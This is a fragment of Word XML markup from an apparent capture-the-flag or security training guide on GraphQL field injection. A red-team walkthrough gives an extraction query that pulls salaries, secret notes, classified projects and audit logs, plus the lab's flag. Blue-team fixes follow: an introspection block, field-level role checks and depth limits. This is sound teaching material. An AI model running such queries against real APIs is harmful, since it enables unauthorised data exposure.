              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Execute → Response includes ALL fields for ALL users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Admin's secret_note: FLAG{graphql_field_injection_win}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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All salaries exposed: admin=₹2,20,000, jiya.sharma=₹1,40,000, karan.dev=₹1,05,000...</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Full data extraction:
{
  users { id username role salary secret_note department }
  projects { id code budget classification internal_notes }
  auditLogs { user action ip ts details }
}</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Extract all projects including TOP SECRET classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "All Projects" preset: { projects { id code budget classification internal_notes } }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response includes "TOP SECRET" classified projects with internal notes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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PROJ-001 internal_notes: "MoD — Do not disclose" — Ministry of Defence project details!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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Introspect schema to discover salary and secret_note fields. Query { users { salary secret_note } } as engineer role → capture FLAG{graphql_field_injection_win} from admin's secret_note.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable introspection in production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Introspection is a development tool — disable it in production environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Without schema knowledge, field injection is much harder to exploit.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># FIXED — block introspection queries:
@app.route("/api/graphql", methods=["POST"])
def graphql_fixed():
    u = jwt_user()
    if not u: return 401
    q = request.get_json().get("query", "")
    # Block introspection:
    if "__schema" in q or "__type" in q:
        return jsonify({"errors": [{"message": "Introspection is disabled"}]}), 403
    # ... rest of handler</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement field-level authorization — check role before returning restricted fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The schema says salary and secret_note are "admin only" — enforce this in code!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Check the requesting user's role before including restricted fields in the response.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># FIXED — field-level auth:
if "salary" in q or "secret_note" in q:
    if u.get("role") not in ["ciso", "admin"]:  # enforce restriction
        return jsonify({"errors": [{"message": "salary and secret_note require admin role"}]}), 403
    result["users"] = GQL_USERS  # full data only for admin
else:
    result["users"] = [
        {"id": x["id"], "username": x["username"], "role": x["role"]}
        for x in GQL_USERS
    ]</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Use query depth limiting and cost analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Complex nested GraphQL queries can be used for DoS (deep query attacks).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Limit query depth and complexity using GraphQL middleware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Use persisted queries (allowlist of pre-approved query hashes) for highest security.</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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GraphQL introspection attacks exposed internal data at multiple major companies in 2022-2023. Shopify paid $25k for a GraphQL field injection bug. Without proper field-level auth, GraphQL APIs frequently expose more data than REST equivalents — schema-driven development requires schema-driven authorization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V8</w:t>
            </w:r>
          </w:p>
